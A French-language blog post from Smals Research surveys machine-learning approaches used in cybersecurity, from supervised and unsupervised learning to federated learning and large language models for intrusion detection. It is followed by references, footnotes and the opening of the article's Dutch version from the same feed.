<p>Au cours de la dernière décennie, l’apprentissage automatique a permis des avancées importantes dans différents domaines, d’abord avec des modèles dit <strong>supervisés</strong> (on indique à la machine la classe des éléments à apprendre, par exemple telle transaction est frauduleuse ou bénigne), puis <strong>non-supervisé</strong> (la machine doit découvrir elle-même les différentes classes en fonction des données), l’apprentissage <strong>par renforcement</strong> (la machine reçoit une forme de récompense lorsqu’elle classifie correctement des informations). La Figure&nbsp;1 montre les principaux algorithmes d’apprentissage automatique utilisés en cybersécurité.</p>



<figure class="wp-block-image aligncenter size-large"><a href="/wp-content/uploads/2023/12/Algorithmes-dapprentissage.png"><img loading="lazy" decoding="async" width="1024" height="521" src="/wp-content/uploads/2023/12/Algorithmes-dapprentissage-1024x521.png" alt="Principaux algorithmes d’apprentissage automatique utilisés en cybersécurité." class="wp-image-19666" srcset="https://www.smalsresearch.be/wp-content/uploads/2023/12/Algorithmes-dapprentissage-1024x521.png 1024w, https://www.smalsresearch.be/wp-content/uploads/2023/12/Algorithmes-dapprentissage-768x390.png 768w, https://www.smalsresearch.be/wp-content/uploads/2023/12/Algorithmes-dapprentissage-2048x1041.png 2048w, https://www.smalsresearch.be/wp-content/uploads/2023/12/Algorithmes-dapprentissage-300x153.png 300w, https://www.smalsresearch.be/wp-content/uploads/2023/12/Algorithmes-dapprentissage-1536x781.png 1536w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></a><figcaption class="wp-element-caption">Figure 1 – Les principaux algorithmes d’apprentissage automatique utilisés en cybersécurité  (d’après <a href="#ref7">[7]</a>). </figcaption></figure>



<h1 class="wp-block-heading">Apprentissage supervisé</h1>



<p>Les modèles d’apprentissage supervisé sont formés à partir de données <em>étiquetées</em>, c’est-à-dire qu’une catégorie est fournie pour chaque élément du jeu de données d’apprentissage. Une catégorie peut être binaire (p. ex. «&nbsp;attaque&nbsp;» ou «&nbsp;bénin&nbsp;») ou multiple (p. ex. type d’attaque). Cela suppose en amont, un travail manuel coûteux de catégorisation des données. Pour un système de cybersécurité cela implique par exemple que les analystes catégorisent chacune des données qu’ils ont analysées, avec la difficulté supplémentaire qu’il y a en général peu d’exemples d’attaques par rapport aux autres exemples.</p>



<p>L’apprentissage consiste alors à découvrir, à partir des données étiquetées, les caractéristiques liées à chaque catégorie et à construire un modèle pouvant établir avec une certaine probabilité à quelle catégorie appartient un nouvel élément jamais vu lors de l’apprentissage.</p>



<p>Cependant ces systèmes supervisés ne peuvent pas être utilisés pour détecter des types d’attaques qui ne leur sont pas déjà connus. De plus, bien que l’apprentissage supervisé fonctionne particulièrement bien pour la reconnaissance d’objets dans les images, la détection de menaces de cybersécurité présente des difficultés particulières. En effet, comme le font remarquer Apruzzese et al.&nbsp;<a href="#ref8">[8]</a>, un échantillon étiqueté comme malicieux dans un certain contexte peut être bénin dans un autre, un échantillon peut être créé spécialement pour ressembler à un échantillon bénin, ou encore un échantillon étiqueté bénin aujourd’hui, peut s’avérer dangereux demain.</p>



<p>Les exemples d’algorithmes d’apprentissage supervisé incluent&nbsp;: les arbres de décision (« <em>decision trees (DT)</em> »), les forêts d’arbres décisionnels (« <em>random forests (RF)</em> »), la classification naïve bayésienne<sup><a href="#_ftn6" name="_ftnref6">6</a></sup>, les réseaux de neurones artificiels (« <em>neural networks (NN)</em> »)<sup><a href="#_ftn7" name="_ftnref7">7</a></sup>, les machines à vecteurs de support («&nbsp;<em>support vector machines (SVM)</em>&nbsp;»), etc.</p>



<h1 class="wp-block-heading">Apprentissage non-supervisé</h1>



<p>Les algorithmes d’apprentissage non-supervisés quant à eux, apprennent les informations et créent des groupes sur la base de l’ensemble des données d’apprentissage, sans connaître la catégorie de chaque donnée. La différence entre l’apprentissage supervisé et l’apprentissage non-supervisé est donc que ce dernier n’a pas d’étiquettes de catégories dans ses données d’apprentissage.</p>



<p>Des exemples d’algorithmes d’apprentissage non-supervisés sont ceux qui tentent de grouper ensemble les échantillons d’un même type, comme le partitionnement en <em>k</em>-moyennes (« k<em>-means</em> ») et la méthode des <em>k</em> plus proches voisins (« <em>k-nearest neighbours (k-NN)</em> »). En dehors du regroupement, l’utilisation plus récente d’auto-encodeurs est une technique assez populaire pour la détection d’anomalies et en particulier d’intrusions (p. ex. <a href="#ref9">[9]</a>).</p>



<p>Un auto-encodeur est composé d’une couche d’entrée (codeur), de plusieurs couches cachées et d’une couche de sortie (décodeur). L’objectif est d’apprendre une représentation comprimée de certaines données d’entrée. Le codeur est utilisé pour mettre en correspondance les données d’entrée dans une représentation cachée, le décodeur est destiné à reconstruire les données d’entrée à partir d’une telle représentation. Un encodeur peut être entraîné avec des données bénignes afin d’apprendre une représentation normale du trafic sur un réseau. Ensuite, pendant la phase de détection, un échantillon est considéré comme anormal si, après son encodage, l’erreur de reconstruction est supérieure à un certain niveau.</p>



<h1 class="wp-block-heading">Apprentissage semi-supervisé</h1>



<p>L’apprentissage semi-supervisé est basé à la fois sur des données étiquetées et des données non étiquetées. Il permet de fournir des classificateurs efficaces qui nécessitent de petites quantités de données étiquetées en exploitant les informations obtenues à partir de grands ensembles de données non étiquetées. De nombreux chercheurs ont constaté que les données non étiquetées, lorsqu&#8217;elles sont utilisées en conjonction avec une petite quantité de données étiquetées, peuvent améliorer considérablement la précision de l&#8217;apprentissage par rapport à l&#8217;apprentissage non supervisé, mais sans le temps et les coûts nécessaires à l&#8217;apprentissage supervisé.</p>



<p>Dans l’apprentissage actif&nbsp;<a href="#ref10">[10]</a> par exemple, un algorithme de classification initialement entraîné sur un petit ensemble de données étiquetées (p. ex. « normal, » « rootkit, » « teardrop »<a href="#_ftn8" name="_ftnref8"><sup>8</sup></a>) peut être utilisé pour analyser un grand ensemble de données brutes, puis « suggérer » les échantillons les plus avantageux à étiqueter. Ces échantillons sont sélectionnés grâce à un algorithme non supervisé de détection d’anomalies. Un expert est ensuite consulté pour étiqueter les échantillons présentés et le modèle est mis à jour.</p>



<p>Plusieurs travaux ont proposé des solutions d’apprentissage semi-supervisé dans différents domaines de cybersécurité, que ce soit la détection de logiciels malveillants (p. ex. <a href="#ref12">[12]</a>) ou la détection d’intrusions (p. ex.&nbsp;<a href="#ref13">[13]</a>). Beaucoup de méthodes s’inspirent de la méthode populaire de co-apprentissage&nbsp;<a href="#ref14">[14]</a> proposée à la fin des années 1990.</p>



<h1 class="wp-block-heading">Apprentissage par renforcement</h1>



<p>L’apprentissage par renforcement («&nbsp;<em>reinforcement learning (RL)</em>&nbsp;»), est basé sur l’essai et l’erreur&nbsp;: un agent autonome apprend à prendre des décisions dans un environnement donné. L’environnement offre une récompense ou pas à l’agent après chaque décisions prise. Les données d’apprentissage dans l’apprentissage par renforcement sont un mélange d’approches supervisées et non-supervisées&nbsp;: au lieu de fournir des données avec l’étiquette correcte, l’algorithme explore les actions jusqu’à ce qu’elles soient correctes.</p>



<p>Malgré l’avantage de l’apprentissage par renforcement qui sait s’adapter à des changements dans l’environnement, il reste une difficulté limitant son utilisation dans la cybersécurité&nbsp;: la définition de la fonction de récompense en particulier dans le domaine de la détection d’intrusions&nbsp;<a href="#ref15">[15]</a>,&nbsp;<a href="#ref16">[16]</a>.</p>



<h1 class="wp-block-heading">Apprentissage automatique fédéré</h1>



<p>Introduit par McMahan et al. &nbsp;<a href="#ref17">[17]</a>, l’apprentissage automatique fédéré (« <em>federated learning</em> ») est une manière distribuée et collaborative de faire de l’apprentissage automatique. Les machines participant à l’apprentissage ne sont pas obligées de partager leurs données et se contentent d’envoyer des modèles appris sur leurs données afin de contribuer à un modèle global qui est le résultat de la combinaison de l’ensemble des modèles locaux<sup><a href="#_ftn9" name="_ftnref9">9</a></sup>.</p>



<figure class="wp-block-image aligncenter size-large"><a href="/wp-content/uploads/2023/12/Apprentissage-federe.png"><img loading="lazy" decoding="async" width="616" height="1024" src="/wp-content/uploads/2023/12/Apprentissage-federe-616x1024.png" alt="Exemple d’apprentissage fédéré centralisé : un serveur central orchestre l’apprentissage, permettant un protocole relativement simple. Dans le cas non-centralisé, les participants s’envoient des modèles partiels en pair-à-pair." class="wp-image-19669" srcset="https://www.smalsresearch.be/wp-content/uploads/2023/12/Apprentissage-federe-616x1024.png 616w, https://www.smalsresearch.be/wp-content/uploads/2023/12/Apprentissage-federe-180x300.png 180w, https://www.smalsresearch.be/wp-content/uploads/2023/12/Apprentissage-federe-768x1277.png 768w, https://www.smalsresearch.be/wp-content/uploads/2023/12/Apprentissage-federe-924x1536.png 924w, https://www.smalsresearch.be/wp-content/uploads/2023/12/Apprentissage-federe-1232x2048.png 1232w, https://www.smalsresearch.be/wp-content/uploads/2023/12/Apprentissage-federe-scaled.png 1540w" sizes="auto, (max-width: 616px) 100vw, 616px" /></a><figcaption class="wp-element-caption">Figure 2 – Exemple d’apprentissage fédéré centralisé : un serveur central orchestre l’apprentissage, permettant un protocole relativement simple. Dans le cas non-centralisé, les participants s’envoient des modèles partiels en pair-à-pair.</figcaption></figure>



<p>D’après Hernández-Ramos et al. &nbsp;<a href="#ref18">[18]</a> l’apprentissage fédéré pourrait jouer un rôle important dans le domaine de la cybersécurité car il pourrait permettre à des organisations distinctes de partager des informations sur les menaces et les attaques de sécurité sans avoir besoin de partager<a href="#_ftn10" name="_ftnref10"><sup>10</sup></a>&nbsp;leurs données réelles et potentiellement sensibles<sup><a href="#_ftn11" name="_ftnref11">11</a></sup>. Dans leur analyse, les auteurs soulignent que l’utilisation de l’apprentissage automatique fédéré dans le domaine de la détection d’intrusions a proliféré au cours des dernières années<sup><a href="#_ftn12" name="_ftnref12">12</a></sup>. Malgré leur coût et leurs limites, les méthodes fédérées supervisées restent les plus couramment étudiées par rapport aux méthodes fédérées non-supervisées.</p>



<h1 class="wp-block-heading"><a id="LLM"></a>Modèles massifs de langage</h1>



<p>Les modèles massifs de langage (« <em>Large Language Models (LLM)</em> ») sont obtenus par un apprentissage non-supervisé de réseaux de neurones profonds<a href="#_ftn13" name="_ftnref13"><sup>13</sup></a> entraînés sur de très grandes quantités de textes non étiquetés. On trouve parmi eux les transformeurs<a href="#_ftn14" name="_ftnref14"><sup>14</sup></a>&nbsp;<a href="#ref20">[20]</a>, &nbsp;<a href="#ref21">[21]</a> génératifs pré-entrainés («&nbsp;<em>generative pre-trained transformers (GPT)</em>&nbsp;») dont la fonction principale est de prédire de manière statistique le mot suivant dans un passage de texte<a href="#_ftn15" name="_ftnref15"><sup>15</sup></a>. Une description plus détaillée de ces modèles peut être trouvée dans&nbsp;<a href="#ref22">[22]</a>.</p>



<p>Les applications de ces modèles à la cybersécurité sont encore limitées car peu d’entre elles utilisent du texte et des données dans un langage naturel. Cependant, un aspect intriguant de ces modèles massifs de langage est l’hypothèse contestée selon laquelle ils exhiberaient des capacités émergentes, qui «&nbsp;<em>ne sont pas présentes dans les modèles à plus petite échelle, mais qui sont présentes dans les modèles à grande échelle</em>&nbsp;»&nbsp;<a href="#ref23">[23]</a>, &nbsp;<a href="#ref24">[24]</a>. On peut donc se poser la question si ces capacités émergentes pourraient inclure la cybersécurité.</p>



<p>Une approche permettant de bénéficier des architectures des LLM est d’utiliser des transformeurs et d’autres aspects architecturaux des LLM, et de pré-entraîner le modèle sur des données de sécurité. Bien que les transformeurs soient surtout connus pour leur résultat dans le traitement des langages naturels, ils peuvent également être considérés pour la détection d’intrusions (p. ex. &nbsp;<a href="#ref25">[25]</a>).</p>



<p>Étant donné les avancées récentes des modèles génératifs, il est très probable qu’ils seront beaucoup étudiés dans les années qui viennent pour le développement de détection d’intrusions.</p>



<h1 class="wp-block-heading">Conclusions</h1>



<p>L’intérêt pour les techniques d’IA dans le domaine de la sécurité est évident, ne serait-ce qu’au vu du nombre important de publications, des articles de revue de littérature sur le sujet et des produits de cybersécurité se targuant de leur emploi.</p>



<p>Cependant, s’il ne fait aucun doute que l’IA est utile pour analyser des données existantes, les résultats donnés sont, comme nous l’avons vu, par construction, basés sur les données déjà observées. Par conséquent, même si les progrès impressionnants de l’IA peuvent le laisser imaginer, il reste encore à prouver que l’IA a des capacités créatrices suffisantes lui permettant de détecter des nouveaux vecteurs d’attaques sans requérir à l’expertise et l’intuition humaine. De plus, l’évaluation d’un risque dépend de nombreux facteurs parfois difficilement quantifiables comme le contexte géopolitique ou socio-économique.</p>



<p>L’IA doit donc être considérée comme une étape dans l’évolution de la sécurité, plutôt que comme une révolution complète. Comme nous le verrons dans un prochain article, elle joue un rôle dans l’amélioration des pratiques de sécurité, mais ne doit pas remplacer entièrement l’intervention humaine et la prise de décision.</p>



<h1 class="wp-block-heading">Références</h1>



<p><a id="ref1"></a>[1]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; N. Fatès, «&nbsp;Que faire de l’expression intelligence artificielle ?&nbsp;», <em>Alliage : Culture-Science-Technique</em>, nov. 2023, [En ligne]. Disponible sur: <a href="https://www.vie-publique.fr/rapport/37225-donner-un-sens-lintelligence-artificielle-pour-une-strategie-nation" target="_blank" rel="noopener">https://inria.hal.science/hal-04282291/document</a></p>



<p><a id="ref2"></a>[2]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; M. Brundage <em>et al.</em>, «&nbsp;The malicious use of artificial intelligence: forecasting, prevention and mitigation&nbsp;», févr. 2018.</p>



<p><a id="ref3"></a>[3]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; C. Villani, «&nbsp;Donner un sens à l’intelligence artificielle &#8211; Pour une stratégie nationale et européenne&nbsp;», mars 2018. [En ligne]. Disponible sur: <a href="https://www.vie-publique.fr/rapport/37225-donner-un-sens-lintelligence-artificielle-pour-une-strategie-nation" target="_blank" rel="noopener">https://www.vie-publique.fr/rapport/37225-donner-un-sens-lintelligence-artificielle-pour-une-strategie-nation</a></p>



<p><a id="ref4"></a>[4]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; M. Taddeo, T. McCutcheon, et L. Floridi, «&nbsp;Trusting artificial intelligence in cybersecurity is a double-edged sword&nbsp;», <em>Nat Mach Intell</em>, vol. 1, n<sup>o</sup> 12, p. 557‑560, nov. 2019, <a href="https://www.doi.org/10.1038/s42256-019-0109-1" target="_blank" rel="noopener">doi: 10.1038/s42256-019-0109-1</a>.</p>



<p><a id="ref5"></a>[5]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; K. Renaud, M. Warkentin, et G. Westerman, «&nbsp;From ChatGPT to HackGPT: Meeting the cybersecurity threat of generative AI&nbsp;», <em>MIT Sloan Management Review</em>, 18 avril 2023.</p>



<p><a id="ref6"></a>[6]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; D. Dasgupta, Z. Akhtar, et S. Sen, «&nbsp;Machine learning in cybersecurity: a comprehensive survey&nbsp;», <em>Journal of Defense Modeling &amp; Simulation</em>, vol. 19, n<sup>o</sup> 1, p. 57‑106, janv. 2022, <a href="https://www.doi.org/10.1177/1548512920951275" target="_blank" rel="noopener">doi: 10.1177/1548512920951275</a>.</p>



<p><a id="ref7"></a>[7]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; G. Apruzzese <em>et al.</em>, «&nbsp;The role of machine learning in cybersecurity&nbsp;», <em>Digital Threats</em>, vol. 4, n<sup>o</sup> 1, p. 1‑38, mars 2023, <a href="https://www.doi.org/10.1145/3545574">doi: 10.1145/3545574</a>.</p>



<p><a id="ref8"></a>[8]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; G. Apruzzese, P. Laskov, et A. Tastemirova, «&nbsp;SoK: The impact of unlabelled data in cyberthreat detection&nbsp;», in <em>2022 IEEE 7th European Symposium on Security and Privacy (EuroS&amp;P)</em>, juin 2022, p. 20‑42. <a href="https://www.doi.org/10.1109/EuroSP53844.2022.00010" target="_blank" rel="noopener">doi: 10.1109/EuroSP53844.2022.00010</a>.</p>



<p><a id="ref9"></a>[9]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Y. Mirsky, T. Doitshman, Y. Elovici, et A. Shabtai, «&nbsp;Kitsune: An ensemble of autoencoders for online network intrusion detection&nbsp;». arXiv, 27 mai 2018. Consulté le: 26 octobre 2023. [En ligne]. Disponible sur: <a href="https://arxiv.org/abs/1802.09089" target="_blank" rel="noopener">http://arxiv.org/abs/1802.09089</a></p>



<p><a id="ref10"></a>[10]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; K. Yang, J. Ren, Y. Zhu, et W. Zhang, «&nbsp;Active learning for wireless IoT intrusion detection&nbsp;», <em>IEEE Wireless Commun.</em>, vol. 25, n<sup>o</sup> 6, p. 19‑25, déc. 2018, <a href="https://www.doi.org/10.1109/MWC.2017.1800079" target="_blank" rel="noopener">doi: 10.1109/MWC.2017.1800079</a>.</p>



<p><a id="ref11"></a>[11]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; «&nbsp;KDD Cup 1999 Data&nbsp;». Consulté le: 8 décembre 2023. [En ligne]. Disponible sur: <a href="https://kdd.ics.uci.edu/databases/kddcup99/kddcup99.html" target="_blank" rel="noopener">http://kdd.ics.uci.edu/databases/kddcup99/kddcup99.html</a></p>



<p><a id="ref12"></a>[12]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; J. Koza, M. Krčál, et M. Holeňa, « Two semi-supervised approaches to malware detection with neural networks », présenté à Information technologies &#8211; Applications and theory (ITAT), 2020.</p>



<p><a id="ref13"></a>[13]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; L. Sun, Y. Zhou, Y. Wang, C. Zhu, et W. Zhang, «&nbsp;The effective methods for intrusion detection with limited network attack data: multi-task learning and oversampling&nbsp;», <em>IEEE Access</em>, vol. 8, p. 185384‑185398, 2020, <a href="https://www.doi.org/10.1109/ACCESS.2020.3029100" target="_blank" rel="noopener">doi: 10.1109/ACCESS.2020.3029100</a>.</p>



<p><a id="ref14"></a>[14]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; A. Blum et T. Mitchell, «&nbsp;Combining labeled and unlabeled data with co-training&nbsp;», in <em>Proceedings of the eleventh annual conference on Computational learning theory</em>, Madison Wisconsin USA: ACM, juill. 1998, p. 92‑100. <a href="https://www.doi.org/10.1145/279943.279962" target="_blank" rel="noopener">doi: 10.1145/279943.279962</a>.</p>



<p><a id="ref15"></a>[15]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; E. Bertino, M. Kantarcioglu, C. G. Akcora, S. Samtani, S. Mittal, et M. Gupta, «&nbsp;AI for security and security for AI&nbsp;», in <em>Proceedings of the Eleventh ACM Conference on Data and Application Security and Privacy</em>, Virtual Event USA: ACM, avr. 2021, p. 333‑334. <a href="https://www.doi.org/10.1145/3422337.3450357" target="_blank" rel="noopener">doi: 10.1145/3422337.3450357</a>.</p>



<p><a id="ref16"></a>[16]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; M. Lopez-Martin, B. Carro, et A. Sanchez-Esguevillas, «&nbsp;Application of deep reinforcement learning to intrusion detection for supervised problems&nbsp;», <em>Expert Systems with Applications</em>, vol. 141, p. 112963, mars 2020, <a href="https://www.doi.org/10.1016/j.eswa.2019.112963" target="_blank" rel="noopener">doi: 10.1016/j.eswa.2019.112963</a>.</p>



<p><a id="ref17"></a>[17]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; H. B. McMahan, E. Moore, D. Ramage, et S. Hampson, «&nbsp;Communication-efﬁcient learning of deep networks from decentralized data&nbsp;», <em>Proceedings of machine learning research</em>, p. 1273‑1282, avr. 2017.</p>



<p><a id="ref18"></a>[18]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; J. L. Hernández-Ramos <em>et al.</em>, «&nbsp;Intrusion detection based on federated learning: a systematic review&nbsp;». arXiv, 18 août 2023. Consulté le: 17 octobre 2023. [En ligne]. Disponible sur: <a href="https://arxiv.org/abs/2308.09522" target="_blank" rel="noopener">http://arxiv.org/abs/2308.09522</a></p>



<p><a id="ref19"></a>[19]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; E.-M. El-Mhamdi <em>et al.</em>, «&nbsp;On the impossible safety of large AI models&nbsp;». arXiv, 9 mai 2023. Consulté le: 17 octobre 2023. [En ligne]. Disponible sur: <a href="https://arxiv.org/abs/2209.15259" target="_blank" rel="noopener">http://arxiv.org/abs/2209.15259</a></p>



<p><a id="ref20"></a>[20]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; A. Vaswani <em>et al.</em>, «&nbsp;Attention is all you need&nbsp;», <em>Advances in neural information processing systems</em>, vol. 30, 2017.</p>



<p><a id="ref21"></a>[21]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; T. Lin, Y. Wang, X. Liu, et X. Qiu, «&nbsp;A survey of transformers&nbsp;», <em>AI Open</em>, vol. 3, p. 111‑132, 2022, <a href="https://www.doi.org/10.1016/j.aiopen.2022.10.001" target="_blank" rel="noopener">doi: 10.1016/j.aiopen.2022.10.001</a>.</p>



[<a id="ref22"></a>22]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; B. Vanhalst, «&nbsp;Un propre système de questions/réponses basé sur des modèles de langue | Smals Research&nbsp;», Smals Research Blog. Consulté le: 17 octobre 2023. [En ligne]. Disponible sur: <a href="/un-propre-systeme-de-questions-reponses-base-sur-des-modeles-de-langue/" target="_blank" rel="noopener">/un-propre-systeme-de-questions-reponses-base-sur-des-modeles-de-langue/</a></p>



<p><a id="ref23"></a>[23]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; J. Wei <em>et al.</em>, «&nbsp;Emergent abilities of large language models&nbsp;». arXiv, 26 octobre 2022. Consulté le: 9 novembre 2023. [En ligne]. Disponible sur: <a href="https://arxiv.org/abs/2206.07682" target="_blank" rel="noopener">http://arxiv.org/abs/2206.07682</a></p>



<p><a id="ref24"></a>[24]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; R. Schaeffer, B. Miranda, et S. Koyejo, «&nbsp;Are Emergent Abilities of Large Language Models a Mirage?&nbsp;» arXiv, 22 mai 2023. Consulté le: 9 novembre 2023. [En ligne]. Disponible sur: <a href="https://arxiv.org/abs/2304.15004" target="_blank" rel="noopener">http://arxiv.org/abs/2304.15004</a></p>



<p><a id="ref25"></a>[25]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Z. Wu, H. Zhang, P. Wang, et Z. Sun, «&nbsp;RTIDS: A Robust Transformer-Based Approach for Intrusion Detection System&nbsp;», <em>IEEE Access</em>, vol. 10, p. 64375‑64387, 2022, <a href="https://www.doi.org/10.1109/ACCESS.2022.3182333" target="_blank" rel="noopener">doi: 10.1109/ACCESS.2022.3182333</a>.</p>



<h1 class="wp-block-heading">Notes</h1>



<p><a href="#_ftnref1" name="_ftn1"><sup>1</sup></a>&nbsp; &nbsp;<a href="https://www.vie-publique.fr/rapport/37225-donner-un-sens-lintelligence-artificielle-pour-une-strategie-nation" target="_blank" rel="noopener">/1-an-chatgpt/</a></p>



<p><a href="#_ftnref2" name="_ftn2"><sup>2</sup></a>&nbsp; &nbsp;<a href="https://www.vie-publique.fr/rapport/37225-donner-un-sens-lintelligence-artificielle-pour-une-strategie-nation" target="_blank" rel="noopener">https://www.crowdstrike.com/blog/crowdstrike-introduces-charlotte-ai-to-deliver-generative-ai-powered-cybersecurity/</a></p>



<p><a href="#_ftnref3" name="_ftn3"><sup>3</sup></a>&nbsp; &nbsp;<a href="https://www.vie-publique.fr/rapport/37225-donner-un-sens-lintelligence-artificielle-pour-une-strategie-nation" target="_blank" rel="noopener">https://cloud.google.com/blog/products/identity-security/rsa-introducing-ai-powered-investigation-chronicle-security-operations</a></p>



<p><sup><a href="#_ftnref4" name="_ftn4">4</a>&nbsp;</sup> &nbsp;<a href="https://www.vie-publique.fr/rapport/37225-donner-un-sens-lintelligence-artificielle-pour-une-strategie-nation" target="_blank" rel="noopener">https://www.microsoft.com/en-us/security/business/ai-machine-learning/microsoft-security-copilot</a></p>



<p><a href="#_ftnref5" name="_ftn5"><sup>5</sup></a>&nbsp; &nbsp;<a href="https://www.vie-publique.fr/rapport/37225-donner-un-sens-lintelligence-artificielle-pour-une-strategie-nation" target="_blank" rel="noopener">https://www.sentinelone.com/blog/purple-ai-empowering-cybersecurity-analysts-with-ai-driven-threat-hunting-analysis-response/</a></p>



<p><sup><a href="#_ftnref6" name="_ftn6">6</a> </sup>&nbsp; Le terme naïf est lié au fait que la méthode suppose une forte indépendance des caractéristiques utilisées.</p>



<p><sup><a href="#_ftnref7" name="_ftn7">7</a> </sup>&nbsp; Il existe beaucoup de types de réseaux de neurones artificiels, notamment les réseaux à propagation avant (FFNN) –&nbsp;dont le fameux perceptron multicouche&nbsp;– les réseaux convolutifs (CNN), et les réseaux récurrents (RNN).</p>



<p><a href="#_ftnref8" name="_ftn8"><sup>8</sup></a> &nbsp; Ces étiquettes et plusieurs autres sont utilisées dans le jeu de données KDD-99 <a href="#ref11">[11]</a>, très populaire dans la recherche sur la détection d’intrusions.</p>



<p><sup><a href="#_ftnref9" name="_ftn9">9</a> </sup>&nbsp; Bien que les types de modèles locaux puissent être différents chez chaque participant, peu de travaux considèrent cette possibilité. De plus, la plupart des travaux utilisent une moyenne pondérée pour la mise à jour du modèle central, et ne peuvent prendre en compte correctement l’hétérogénéité des données et des appareils.</p>



<p><a href="#_ftnref10" name="_ftn10"><sup>10</sup></a> Cette incitation au partage va dans le sens de la réglementation européenne en matière de cybersécurité qui rend obligatoire le signalement des incidents de cybersécurité.</p>



<p><a href="#_ftnref11" name="_ftn11"><sup>11</sup></a> Soulignons néanmoins que la sécurité de ces modèles fédérés est contestée&nbsp;<a href="#ref19">[19]</a>.</p>



<p><a href="#_ftnref12" name="_ftn12"><sup>12</sup></a> Le nombre de publications sur le sujet est passé de moins de 5 en 2018 à plus de 150 en 2022.</p>



<p><sup><a href="#_ftnref13" name="_ftn13">13</a></sup> C’est-à-dire un réseau de neurones avec au moins deux couches successives de neurones.</p>



<p><sup><a href="#_ftnref14" name="_ftn14">14</a></sup> Bien que le terme ne soit pas repris dans les dictionnaires de français, il est utilisé dans la littérature scientifique francophone.</p>



<p><sup><a href="#_ftnref15" name="_ftn15">15</a></sup>&nbsp;On constate que, si le modèle est suffisamment grand, non seulement la grammaire des langues humaines peut être apprise, mais aussi le sens des mots, la connaissance commune et la logique primitive. Et si l’on donne par exemple le fragment de phrase «&nbsp;<em>Le chat de mon voisin est</em>&nbsp;» à un modèle, il y a beaucoup plus de chance qu’il prédise «&nbsp;<em>gris</em>&nbsp;» ou «&nbsp;<em>maigre</em>&nbsp;» que «&nbsp;<em>néerlandophone,</em>&nbsp;» bien que ces trois mots soient des adjectifs. De même, en fournissant une phrase complète on peut s’attendre à ce que le modèle prédise une phrase cohérente pour la suivre.</p>



<p>_________________________<br><em>Ce post est une contribution individuelle de Fabien A. P. Petitcolas, spécialisé en sécurité informatique chez Smals Research. Cet article est écrit en son nom propre et n&#8217;impacte en rien le point de vue de Smals.</em></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>AI en cyberbeveiliging</title>
		<link>https://www.smalsresearch.be/ai-en-cyberbeveiliging/</link>
		
		<dc:creator><![CDATA[Fabien A. P. Petitcolas]]></dc:creator>
		<pubDate>Wed, 20 Dec 2023 07:00:00 +0000</pubDate>
				<category><![CDATA[[NL]]]></category>
		<category><![CDATA[Blog post]]></category>
		<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Machine Learning]]></category>
		<category><![CDATA[Security]]></category>
		<guid isPermaLink="false">/?p=19725</guid>

					<description><![CDATA[In dit artikel beschrijven we kort een aantal "kunstmatige intelligentie"-technieken die worden gebruikt in cyberbeveiliging.]]></description>
										<content:encoded><![CDATA[
<p><a href="/lia-en-cybersecurite/"><em>Version en français</em></a></p>



<p>De fenomenale ontwikkeling van machine learning (ML) technieken en, meer in het algemeen, kunstmatige intelligentie (AI)&nbsp;<a href="#_ref1">[1]</a>, lijkt de laatste jaren haar hoogtepunt te hebben bereikt met de komst van generatieve AI (“Generative AI (GenAI)”) en het emblematische ChatGPT<sup><a href="#_ftn1" name="_ftnref1"><sup>1</sup></a></sup>. Ondanks de vele beperkingen van deze technologieën en de risico’s die ze met zich meebrengen&nbsp;<a href="#_ref2">[2]</a>,&nbsp;<a href="#_ref3">[3]</a>, zijn er op veel gebieden positieve toepassingen (bijv. zoekmachines, automatische vertaling, automatische annotatie van afbeeldingen, enz.). We kunnen ons dan ook afvragen wat deze technologieën kunnen bijdragen aan cybersecurity.</p>



<p>In feite hebben cybersecurity experts niet gewacht op de komst van generatieve AI om AI-technieken te gebruiken. Maar op het gebied van cyberbeveiliging, zoals vaak het geval is met andere technologieën, wordt de toepassing van AI vaak gezien als een tweesnijdend zwaard in die zin dat het kan worden gebruikt voor zowel aanval als verdediging: aan de ene kant maakt AI het mogelijk om steeds geavanceerdere aanvallen te ontwikkelen, en aan de andere kant om effectievere reacties op aanvallen te bieden, zoals verbeterde detectie van bedreigingen en anomalieën en operationele ondersteuning voor beveiligingsanalisten <a href="#_ref4">[4]</a>.</p>



<p>De invoering van aanvallen met behulp van AI zou zelfs, volgens Renault et al.&nbsp;<a href="#_ref5">[5]</a>, een nieuw tijdperk openen in de beveiligingsrace met bekende en onbekende transformaties van aanvalsvectoren. Hoewel er geen twijfel over bestaat dat tegenstanders generatieve AI zullen gebruiken of reeds gebruiken om realistischere en effectievere phishingmails te ontwerpen of om zich voor te doen als andere gebruikers, is het helemaal niet duidelijk of ze generatieve AI zullen kunnen gebruiken om geavanceerdere aanvallen uit te voeren of zelfs om nieuwe aanvalsklassen te creëren.</p>



